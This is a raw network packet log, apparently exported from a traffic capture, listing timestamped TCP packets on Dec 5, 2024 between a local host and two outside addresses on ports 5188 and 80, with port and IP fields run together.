                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.821497917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.821512938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.821578026 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.822545052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.823246956 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.823400974 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.823683977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.824409008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.824457884 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.824851990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.824866056 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.824925900 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.825970888 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.826191902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.826250076 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.827125072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.827467918 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.827529907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.828234911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.828896999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.828938007 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.829377890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.830111980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.830163002 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.830625057 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.831001043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.831077099 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.831700087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.831958055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.832019091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.832849026 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.833862066 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.833992004 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.834007025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.834037066 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.834063053 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.835119009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.835498095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.835556030 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.836218119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.836294889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.836343050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.837376118 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.838490009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.838563919 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.839268923 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.839353085 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.839519024 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.839953899 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.840145111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.840193033 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.840759039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.841262102 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.841336966 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.841922998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.841936111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.841979980 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.843048096 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.843276978 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.843362093 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.844168901 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.844265938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.844378948 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.845360994 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.845496893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.845587969 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.846471071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.846697092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.846736908 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.847615004 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.848011017 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.848105907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.848789930 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.848965883 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.849024057 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.849867105 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.849978924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.850035906 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.851152897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.852045059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.852088928 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.852170944 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.852411985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.852575064 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.853307009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.853399992 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.853579998 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.854391098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.854419947 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.854468107 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.855573893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.855603933 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.855684042 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.856669903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.856739998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.856784105 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.857889891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.857980013 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.858058929 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.858974934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.859041929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.859131098 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.860097885 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.860183954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.860229015 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.861218929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.861305952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.861351967 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.862396002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.862514019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.862585068 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.863521099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.863651991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.863709927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.864675999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.864758968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.864836931 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.865792990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.865953922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.866044044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.866935968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.867090940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.867182016 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.868191004 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.868205070 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.868277073 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.869224072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.869585991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.869658947 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.870311022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.920659065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.920768023 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.920823097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.920864105 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.921272039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.921320915 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.921590090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.921633959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.922452927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.922503948 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.923345089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.923389912 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.923552036 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.923564911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.923610926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.924230099 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.924623966 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.924673080 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.925081015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.925132990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.925889015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.925995111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.926114082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.926156044 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.927195072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.927256107 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.927572012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.927627087 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.928919077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.928963900 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.929970980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.929986954 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.930000067 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.930021048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.930043936 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.930989027 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.931011915 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.931049109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.931075096 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.931946039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.932029963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.932075024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.933001995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.933046103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.933387041 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.933433056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.934273005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.934286118 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.934320927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.935122013 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.935165882 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.935535908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.935585022 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.936153889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.936208963 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.936366081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.936419010 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.937345982 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.937393904 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.937398911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.937434912 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.938699007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.938759089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.938950062 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.938992977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.939779997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.940015078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.940155983 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.940202951 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.940781116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.940830946 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.941049099 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.941128969 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.941957951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.942009926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.942193985 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.942235947 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.943067074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.943129063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.943556070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.943599939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.944350004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.944396019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.944509029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.944588900 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.945406914 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.945452929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.946031094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.946083069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.946553946 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.946603060 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.947001934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.947046995 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.947763920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.948009968 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.948111057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.948152065 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.948915005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.948964119 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.949095011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.949242115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.950027943 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.950073004 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.950675011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.950711012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.951200008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.951244116 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.951392889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.951495886 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.952384949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.952434063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.952575922 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.952687979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.953495979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.953537941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.953564882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.953820944 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.954641104 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.954685926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.955296993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.955338001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.955825090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.955867052 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.956134081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.956176996 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.957004070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.957045078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.958159924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.958242893 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.958267927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.958278894 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.958323002 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.959378958 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.959453106 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.959533930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.959578037 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.960434914 CET8049793185.215.113.84192.168.2.11
